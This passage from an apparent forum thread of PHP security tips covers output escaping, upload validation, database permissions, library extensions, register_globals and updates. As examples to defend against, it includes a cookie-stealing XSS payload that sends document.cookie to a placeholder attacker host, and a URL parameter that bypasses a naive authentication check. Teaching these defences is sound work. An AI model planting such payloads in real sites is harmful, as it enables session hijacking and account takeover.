If you display the raw user input on a web page this will be very ugly; it can be even worse if a user inputs this code instead:
Code:
<script>document.location.replace('http://attacker/?c='+document.cookie);</script>
With this, an attacker can steal the cookies of whoever visits that page (the one containing the bio etc.), and this includes session cookies with session IDs in them, so the attacker can hijack your users' sessions and appear to be logged in as other users.
When displaying user input on a page, use htmlentities($user_bio, ENT_QUOTES, 'UTF-8');
6. When uploading files, validate the file mime type
If you are expecting images, make sure the file you are receiving is an image, or it might be a PHP script that can run on your server and do whatever damage you can imagine.
One quick way is to check the file extension:
PHP Code:
$valid_extensions = array('jpg', 'gif', 'png'); // ...
$file_name = basename($_FILES['userfile']['name']);
// Take only the LAST extension and compare it case-insensitively,
// so "photo.JPG" is accepted and "shell.php.jpg" is judged by "jpg".
$ext = strtolower(pathinfo($file_name, PATHINFO_EXTENSION));
if( !in_array($ext, $valid_extensions, true) ) {
    /* This file is invalid */
}
Note that validating the extension is a very simple way, and not the best way, to validate file uploads, but it's effective;
simply because unless you have set your server to interpret .jpg files as PHP scripts, you are fine.
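The section title asks for a MIME type check, so here is an added example (my code, not the original poster's) that goes beyond the extension check above: it whitelists the extension, detects the MIME type from the file's bytes with the fileinfo extension, confirms the image decodes, and stores the file under a random name. The field name "userfile" and the $upload_dir path are assumptions.

```php
<?php
// Added example: validate an uploaded image by extension, by the MIME type
// detected from the file contents (finfo), and by decoding it, then store it
// under a new name. Assumes the form field is "userfile" and that $upload_dir
// is a directory outside the web root (both assumptions, not from the post).

function validate_image_upload(array $file, string $upload_dir): string
{
    // Reject anything PHP itself flagged (partial upload, size limit, ...).
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed, error code ' . ($file['error'] ?? 'unknown'));
    }
    // Only trust a file that actually arrived through this HTTP request.
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Not an uploaded file');
    }

    // 1. Extension whitelist; compare case-insensitively and use only the
    //    LAST extension ("shell.php.jpg" is judged by "jpg").
    $allowed = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
                'gif' => 'image/gif',  'png' => 'image/png'];
    $ext = strtolower(pathinfo(basename($file['name']), PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        throw new RuntimeException("Extension not allowed: $ext");
    }

    // 2. MIME type from the bytes on disk, not from $_FILES['type'], which the
    //    client supplies and can set to anything.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if ($mime !== $allowed[$ext]) {
        throw new RuntimeException("Content is $mime, expected {$allowed[$ext]}");
    }

    // 3. The image decoder must agree; a text file renamed to .png fails here.
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('File does not decode as an image');
    }

    // Never reuse the client's filename: random name plus the vetted extension.
    $dest = rtrim($upload_dir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('Could not move uploaded file');
    }
    return $dest;
}

// Usage from the upload handler (field name and directory are assumptions):
// $saved = validate_image_upload($_FILES['userfile'], '/var/uploads');
```

The decisive control is still the one the post names: the upload directory must never be served with PHP enabled, so even a file that passes all three checks is only ever treated as data.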
7. If you are using 3rd party code libraries, be sure to keep them up to date
If you are using code libraries like Smarty or ADODB etc. be sure to always download the latest version.
8. Give your database users just enough permissions
If a database user is never going to drop tables, then when creating that user don't give it DROP TABLE permissions; normally SELECT, UPDATE, DELETE and INSERT should be enough.
9. Do not allow hosts other than localhost to connect to your database
If you need to, add only that particular host or IP as necessary but never, ever let everyone connect to your database server.
10. Your library file extensions should be PHP
.inc files will be sent to the browser just like text files (unless your server is set up to interpret them as PHP scripts), so users will be able to see your messy code (kidding) and possibly find exploits or see your passwords etc.
Use extensions like config.inc.php, or put a .htaccess file in your library folders (templates, libs etc.) with this one line:
Code:
deny from all
11. Have register globals off or define your variables first
Register globals can be very dangerous, consider this bit of code:
PHP Code:
// $auth is never initialised, so with register_globals on it can be
// supplied by the client in the request instead of being set here.
if( user_logged_in() ) {
    $auth = true;
}
if( $auth ) {
    /* Do some admin stuff */
}
Now, with register_globals on, an attacker can request this page like this and bypass your authentication:
http://yourwebsite.com/admin.php?auth=1
If you have register_globals on and you can't turn it off for some reason, you can fix these issues by defining your variables first:
PHP Code:
$auth = false; // defined up front, so a request parameter cannot set it
if( user_logged_in() ) {
    $auth = true;
}
if( $auth ) {
    /* Do some admin stuff */
}
Defining your variables first is a good programming practice that I suggest you follow anyway.
12. Keep PHP itself up to date
Just take a look at www.php.net, read the release announcements, and note how many security issues they fix in every release to understand why this is important.
13. Read security books
Always look for new books about PHP security to read; you can start with the 4th book in the PHP Thread, which is one of the best books on PHP security, and the author is a member of the PHP team so he knows the internals very well.
14. Contribute to this list
Feel free to reply to this thread and add to this list; it will be helpful for everyone!